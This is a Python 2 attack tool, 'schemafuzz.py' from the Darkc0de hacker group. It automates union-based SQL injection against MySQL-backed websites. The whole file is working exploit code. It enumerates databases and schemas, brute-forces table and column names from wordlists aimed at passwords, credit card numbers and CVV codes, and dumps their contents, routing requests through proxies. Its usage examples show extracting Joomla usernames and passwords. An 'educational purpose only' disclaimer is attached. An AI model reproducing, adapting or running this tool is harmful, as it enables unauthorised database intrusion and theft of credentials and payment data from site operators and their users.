#!/usr/bin/python ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ # MySQL Injection Schema, Dataext, and fuzzer # Share the c0de! # Darkc0de Team # www.darkc0de.com # rsauron[at]gmail[dot]com # Greetz to # d3hydr8, P47r1ck, Tarsian, c0mr@d, reverenddigitalx, beenu, baltazar, C1c4Tr1Z, Well0ne # and the rest of the Darkc0de members # NOTES: # Proxy function may be a little buggy if your using public proxies... Test your proxy prior to using it with this script.. # The script does do a little proxy test.. it does a GET to google.com if data comes back its good... no data = failed and the proxy # will not be used. This is a effort to keep the script from getting stuck in a endless loop. # If the fuzzing part starts returning results for every column and table... that usually means the error is not defined in the ERRORS # variable. Manually visit the page get the error and add it to the variable.. I am not going to explain this. # Any other questions Hit the forums and ask questions. google is your friend! # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # Intended for authorized Web Application Pen Testing! # BE WARNED, THIS TOOL IS VERY LOUD.. #Fill in the error or errors your receiving here. TABLE_ERRORS = ["Warning: mysql_fetch_row()","You have an error in your SQL syntax","doesn't exist","Unknown column","Access denied"] COLUMN_ERRORS = ["Warning: mysql_fetch_row()","You have an error in your SQL syntax","doesn't exist","Unknown column","Access denied"] #Fill in the tables you want tested here. fuzz_tables = ["orders","user","users","username","usernames","mysql.user","member","members","admin","administrator","administrators","login","logins","logon","jos_users","jos_contact_details","userrights","superuser","control","usercontrol","author","autore","artikel","newsletter","tb_user","tb_users","tb_username","tb_usernames","tb_admin","tb_administrator","tb_member","tb_members","tb_login","perdorues","korisnici","webadmin","webadmins","webuser","webusers","webmaster","webmasters","customer","customers","sysuser","sysusers","sysadmin","sysadmins","memberlist","tbluser","tbl_user","tbl_users","a_admin","x_admin","m_admin","adminuser","admin_user","adm","userinfo","user_info","admin_userinfo","userlist","user_list","user_admin","order","user_login","admin_user","admin_login","login_user","login_users","login_admin","login_admins","sitelogin","site_login","sitelogins","site_logins","SiteLogin","Site_Login","User","Users","Admin","Admins","Login","Logins","adminrights","news","perdoruesit"] #Fill in the columns you want tested here. fuzz_columns = ["user","username","password","passwd","pass","cc_number","id","email","emri","fjalekalimi","pwd","user_name","customers_email_address","customers_password","user_password","name","user_pass","admin_user","admin_password","user_pass","admin_pass","usern","user_n","users","login","logins","login_user","login_admin","login_username","user_username","user_login","auid","apwd","adminid","admin_id","adminuser","admin_user","adminuserid","admin_userid","adminusername","admin_username","adminname","admin_name","usr","usr_n","usrname","usr_name","usrpass","usr_pass","usrnam","nc","uid","userid","user_id","myusername","mail","emni","logohu","punonjes","kpro_user","wp_users","emniplote","perdoruesi","perdorimi","punetoret","logini","llogaria","fjalekalimin","kodi","emer","ime","korisnik","korisnici","user1","administrator","administrator_name","mem_login","login_password","login_pass","login_passwd","login_pwd","sifra","lozinka","psw","pass1word","pass_word","passw","pass_w","user_passwd","userpass","userpassword","userpwd","user_pwd","useradmin","user_admin","mypassword","passwrd","admin_pwd","admin_pass","admin_passwd","mem_password","memlogin","userid","admin_id","adminid","e_mail","usrn","u_name","uname","mempassword","mem_pass","mem_passwd","mem_pwd","p_word","pword","p_assword","myusername","myname","my_username","my_name","my_password","my_email","cvvnumber"] import urllib, sys, re, os, socket, httplib, urllib2, time #determine platform if sys.platform == 'linux-i386' or sys.platform == 'linux2' or sys.platform == 'darwin': SysCls = 'clear' elif sys.platform == 'win32' or sys.platform == 'dos' or sys.platform[0:5] == 'ms-dos': SysCls = 'cls' else: SysCls = 'unknown' #say hello os.system(SysCls) if len(sys.argv) <= 1: print "\n|---------------------------------------------------------------|" print "| rsauron[@]gmail[dot]com v4.0 |" print "| 6/2008 schemafuzz.py |" print "| -MySQL v5+ Information_schema Database Enumeration |" print "| -MySQL v4+ Data Extractor |" print "| -MySQL v4+ Table & Column Fuzzer |" print "| Usage: schemafuzz.py [options] |" print "| -h help darkc0de.com |" print "|---------------------------------------------------------------|\n" sys.exit(1) #help option for arg in sys.argv: if arg == "-h": print " Usage: ./schemafuzz.py [options] rsauron[@]gmail[dot]com darkc0de.com" print "\tModes:" print "\tDefine: --dbs Shows all databases user has access too. MySQL v5+" print "\tDefine: --schema Enumerate Information_schema Database. MySQL v5+" print "\tDefine: --full Enumerates all databases information_schema table MySQL v5+" print "\tDefine: --dump Extract information from a Database, Table and Column. MySQL v4+" print "\tDefine: --fuzz Fuzz Tables and Columns. MySQL v4+" print "\tDefine: --info Gets MySQL server configuration only. MySQL v4+" print "\n\tRequired:" print "\tDefine: -u URL \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"" print "\n\tMode dump and schema options:" print "\tDefine: -D \"database_name\"" print "\tDefine: -T \"table_name\"" print "\tDefine: -C \"column_name,column_name...\"" print "\n\tOptional:" print "\tDefine: -p \"127.0.0.1:80 or proxy.txt\"" print "\tDefine: -o \"ouput_file_name.txt\" Default is schemafuzzlog.txt" print "\tDefine: -r row number to start at" print "\tDefine: -v Verbosity off option. Will not display row #'s in dump mode." print "\tDefine: -end \"/*\" or \"--\" Default is \"/*\"" print "\n Ex: ./schemafuzz.py --info -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"" print " Ex: ./schemafuzz.py --dbs -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\"" print " Ex: ./schemafuzz.py --schema -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D catalog -T orders -r 200" print " Ex: ./schemafuzz.py --dump -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -D joomla -T jos_users -C username,password" print " Ex: ./schemafuzz.py --fuzz -u \"www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4\" -end \"--\" -o sitelog.txt" sys.exit(1) #define varablies site = "" dbt = "schemafuzzlog.txt" proxy = "None" count = 0 arg_table = "None" arg_database = "None" arg_columns = "None" arg_end = "/*" arg_row = "Rows" arg_verbose = 1 darkc0de = "concat(0x1e,0x1e," mode = "None" line_URL = "" count_URL = "" gets = 0 cur_db = "" cur_table = "" table_num = 0 terminal = "" num = 0 #Check args for arg in sys.argv: if arg == "-u": site = sys.argv[count+1] elif arg == "-o": dbt = sys.argv[count+1] elif arg == "-p": proxy = sys.argv[count+1] elif arg == "--dump": mode = arg arg_dump = sys.argv[count] elif arg == "--full": mode = arg elif arg == "--schema": mode = arg arg_schema = sys.argv[count] elif arg == "--dbs": mode = arg arg_dbs = sys.argv[count] elif arg == "--fuzz": mode = arg arg_fuzz = sys.argv[count] elif arg == "--info": mode = arg arg_info = sys.argv[count] elif arg == "-D": arg_database = sys.argv[count+1] elif arg == "-T": arg_table = sys.argv[count+1] elif arg == "-C": arg_columns = sys.argv[count+1] elif arg == "-end": arg_end = sys.argv[count+1] elif arg == "-r": num = sys.argv[count+1] table_num = num elif arg == "-v": arg_verbose = sys.argv[count] arg_verbose = 0 count+=1 #Title write file = open(dbt, "a") print "\n|---------------------------------------------------------------|" print "| rsauron[@]gmail[dot]com v4.0 |" print "| 6/2008 schemafuzz.py |" print "| -MySQL v5+ Information_schema Database Enumeration |" print "| -MySQL v4+ Data Extractor |" print "| -MySQL v4+ Table & Column Fuzzer |" print "| Usage: schemafuzz.py [options] |" print "| -h help darkc0de.com |" print "|---------------------------------------------------------------|" file.write("\n|---------------------------------------------------------------|") file.write("\n| rsauron[@]gmail[dot]com v4.0 |") file.write("\n| 6/2008 schemafuzz.py |") file.write("\n| -MySQL v5+ Information_schema Database Enumeration |") file.write("\n| -MySQL v4+ Data Extractor |") file.write("\n| -MySQL v4+ Table & Column Fuzzer |") file.write("\n| Usage: schemafuzz.py [options] |") file.write("\n| -h help darkc0de.com |") file.write("\n|---------------------------------------------------------------|") #Arg Error Checking if site == "": print "\n[-] Must include -u flag and specify a mode." print "[-] For help -h\n" sys.exit(1) if mode == "None": print "\n[-] Mode must be specified --schema, --dbs, --dump, --fuzz, --info, --full." print "[-] For help -h\n" sys.exit(1) if mode == "--schema" and arg_database == "None": print "[-] Must include -D flag!" print "[-] For Help -h\n" sys.exit(1) if mode == "--dump": if arg_table == "None" or arg_columns == "None": print "[-] If MySQL v5+ must include -D, -T and -C flag when --dump specified!" print "[-] If MySQL v4+ must include -T and -C flag when --dump specified!" print "[-] For help -h\n" sys.exit(1) if site.find("darkc0de") == -1: print "\n[-] Site must contain \'darkc0de\'\n" sys.exit(1) if proxy != "None": if len(proxy.split(".")) == 2: proxy = open(proxy, "r").read() if proxy.endswith("\n"): proxy = proxy.rstrip("\n") proxy = proxy.split("\n") if arg_columns != "None": arg_columns = arg_columns.split(",") if site[:7] != "http://": site = "http://"+site if site.endswith("/*"): site = site.rstrip('/*') if site.endswith("--"): site = site.rstrip('--') #Build proxy list print "\n[+] URL:",site file.write("\n\n[+] URL:"+site+"\n") socket.setdefaulttimeout(20) proxy_list = [] if proxy != "None": file.write("[+] Building Proxy List...") print "[+] Building Proxy List..." for p in proxy: try: proxy_handler = urllib2.ProxyHandler({'http': 'http://'+p+'/'}) opener = urllib2.build_opener(proxy_handler) gets+=1 opener.open("http://www.google.com") proxy_list.append(urllib2.build_opener(proxy_handler)) file.write("\n\tProxy:"+p+"- Success") print "\tProxy:",p,"- Success" except: file.write("\tProxy:"+p+"- Failed") print "\tProxy:",p,"- Failed" pass if len(proxy_list) == 0: print "[-] All proxies have failed. App Exiting" sys.exit(1) print "[+] Proxy List Complete" file.write("[+] Proxy List Complete") else: print "[-] Proxy Not Given" file.write("[+] Proxy Not Given") proxy_list.append(urllib2.build_opener()) #Retireve version:user:database head_URL = site.replace("darkc0de","concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)")+arg_end print "[+] Gathering MySQL Server Configuration..." file.write("\n[+] Gathering MySQL Server Configuration...\n") proxy_num = 0 proxy_len = len(proxy_list) while 1: try: gets+=1 source = proxy_list[proxy_num % proxy_len].open(head_URL).read() # Uncomment the following lines to debug issues with gathering server information # print head_URL # print source match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][2:].split("\x1e") version = match[0] user = match[1] database = match[2] print "\tDatabase:", database print "\tUser:", user print "\tVersion:", version file.write("\tDatabase: "+database+"\n") file.write("\tUser: "+user+"\n") file.write("\tVersion: "+version) version = version[0] if mode == "--info": print "[-] Done\n" file.write("\n[-] Done\n") file.close() sys.exit(1) break else: print "[-] No Data Found" sys.exit(1) except (KeyboardInterrupt, SystemExit): raise except: proxy_num+=1 #lets check what we can do based on version if mode == "--schema" or mode == "--dbs" or mode == "--full": if int(version) == 4: print "\n[-] --schema, --dbs and --full can only be used on MySQL v5+ servers!" print "[-] -h for help" sys.exit(1) #Build URLS if mode == "--schema": if arg_database != "None" and arg_table == "None": print "[+] Showing Tables & Columns from database \""+arg_database+"\"" file.write("\n[+] Showing Tables & Columns from database \""+arg_database+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.TABLES+WHERE+table_schema+=+0x"+arg_database.encode("hex")+arg_end arg_row = "Tables" if arg_database != "None" and arg_table != "None": print "[+] Showing Columns from Database \""+arg_database+"\" and Table \""+arg_table+"\"" file.write("\n[+] Showing Columns from database \""+arg_database+"\" and Table \""+arg_table+"\"") line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex") line_URL += "+and+table_name+=+0x"+arg_table.encode("hex") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.COLUMNS+WHERE+table_schema+=+0x"+arg_database.encode("hex") count_URL += "+and+table_name+=+0x"+arg_table.encode("hex")+arg_end arg_row = "Columns" elif mode == "--dump": print "[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"" print "[+] and Column(s) "+str(arg_columns) file.write("\n[+] Dumping data from database \""+str(arg_database)+"\" Table \""+str(arg_table)+"\"") file.write("\n[+] Column(s) "+str(arg_columns)) for column in arg_columns: darkc0de += column+",0x1e," count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+from+"+arg_database+"."+arg_table+arg_end line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)") line_URL += "+from+"+arg_database+"."+arg_table if int(version) == 4: count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+"+arg_table+arg_end line_URL = site.replace("darkc0de",darkc0de+"0x1e,0x20)") line_URL += "+from+"+arg_table elif mode == "--full": print "[+] Starting full SQLi information_schema enumeration..." line_URL = site.replace("darkc0de","concat(0x1e,0x1e,table_schema,0x1e,table_name,0x1e,column_name,0x1e,0x20)") line_URL += "+from+information_schema.columns+where+table_schema+!=+0x"+"information_schema".encode("hex") elif mode == "--dbs": print "[+] Showing all databases current user has access too!" file.write("\n[+] Showing all databases current user has access too!") count_URL = site.replace("darkc0de","concat(0x1e,0x1e,COUNT(*),0x1e,0x20)") count_URL += "+FROM+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex")+arg_end line_URL = site.replace("darkc0de","concat(0x1e,0x1e,schema_name,0x1e,0x20)") line_URL += "+from+information_schema.schemata+where+schema_name+!=+0x"+"information_schema".encode("hex") arg_row = "Databases" line_URL += "+LIMIT+NUM,1"+arg_end print "[+] %s" % time.strftime("%X") file.write("\n[+] %s" % time.strftime("%X")) #Uncomment the lines below to debug issues with the line_URL or count_URL #print count_URL #print line_URL #Fuzz table/columns if mode == "--fuzz": print "[+] Fuzzing Tables & Columns..." file.write("\n[+] Fuzzing Tables & Columns...") fuzz_URL = site+"+from+TABLE"+arg_end for table in fuzz_tables: try: proxy_num+=1 table_URL = fuzz_URL.replace("TABLE",table) gets+=1 source = proxy_list[proxy_num % proxy_len].open(table_URL).read() e = [error for error in TABLE_ERRORS if re.search(error, source)] if len(e) == 0: print "\n[Table]:",table file.write("\n\n[Table]:"+table) for column in fuzz_columns: try: proxy_num+=1 gets+=1 source = proxy_list[proxy_num % proxy_len].open(table_URL.replace("darkc0de", column)).read() # Uncomment the line below to debug issues with the fuzzer # print source e = [error for error in COLUMN_ERRORS if re.search(error, source)] if len(e) == 0: print "[Column]:",column file.write("\n[Column]:"+column) except (KeyboardInterrupt, SystemExit): raise except: pass except (KeyboardInterrupt, SystemExit): raise except: pass #Lets Count how many rows or columns if mode == "--schema" or mode == "--dump" or mode == "--dbs": source = proxy_list[proxy_num % proxy_len].open(count_URL).read() match = re.findall("\x1e\x1e\S+",source) match = match[0][2:].split("\x1e") row_value = match[0] print "[+] Number of "+arg_row+": "+row_value+"\n" file.write("\n[+] Number of "+arg_row+": "+str(row_value)+"\n") ##Schema Enumeration and DataExt loop if mode == "--schema" or mode == "--dump" or mode == "--dbs": while str(table_num) != str(row_value): try: proxy_num+=1 gets+=1 source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read() match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: if mode == "--schema" or mode == "--full": match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] file.write("\n[Database]: "+match[0]+"\n") print "[Database]: "+match[0] print "[Table: Columns]" file.write("[Table: Columns]") if cur_table != match[1]: print "\n["+str(table_num)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2]) cur_table = match[1] table_num = int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() #Gathering Databases only elif mode == "--dbs": match = match[0] file.write("\n["+str(num)+"]"+str(match)) print "["+str(num)+"]",match table_num = int(table_num) + 1 #Collect data from tables & columns elif mode == "--dump": match = re.findall("\x1e\x1e+[\w\d\?\/\_\:\.\=\s\S\-]+\x1e\x1e",source) match = match[0].strip("\x1e").split("\x1e") if arg_verbose == 1: print "\n["+str(num)+"] ", file.write("\n["+str(num)+"] ",) for ddata in match: if ddata == "": ddata = "NoDataInColumn" sys.stdout.write("%s:" % (ddata)) file.write("%s:" % ddata) sys.stdout.flush() table_num = int(table_num) + 1 if arg_verbose == 0: file.write("\n") else: if mode == "--dump": print "["+str(num)+"] No data" table_num = int(table_num) + 1 else: break num = int(num) + 1 except (KeyboardInterrupt, SystemExit): raise except: pass #Full SQLi information_schema Enumeration if mode == "--full": while 1: try: proxy_num+=1 gets+=1 source = proxy_list[proxy_num % proxy_len].open(line_URL.replace("NUM",str(num))).read() match = re.findall("\x1e\x1e\S+",source) if len(match) >= 1: match = match[0][2:].split("\x1e") if cur_db != match[0]: cur_db = match[0] file.write("\n\n[Database]: "+match[0]+"\n") print "\n\n[Database]: "+match[0] print "[Table: Columns]" file.write("[Table: Columns]") table_num=0 if cur_table != match[1]: print "\n["+str(table_num)+"]"+match[1]+": "+match[2], file.write("\n["+str(table_num)+"]"+match[1]+": "+match[2]) cur_table = match[1] table_num = int(table_num) + 1 else: sys.stdout.write(",%s" % (match[2])) file.write(","+match[2]) sys.stdout.flush() else: if num == 0: print "\n[-] No Data Found" break num = int(num) + 1 except (KeyboardInterrupt, SystemExit): raise except: pass #Lets wrap it up! if mode == "--schema" or mode == "--full": print "" print "\n[-] %s" % time.strftime("%X") print "[-] Total URL Requests",gets file.write("\n\n[-] [%s]" % time.strftime("%X")) file.write("\n[-] Total URL Requests "+str(gets)) print "[-] Done\n" file.write("\n[-] Done\n") print "Don't forget to check", dbt,"\n" file.close()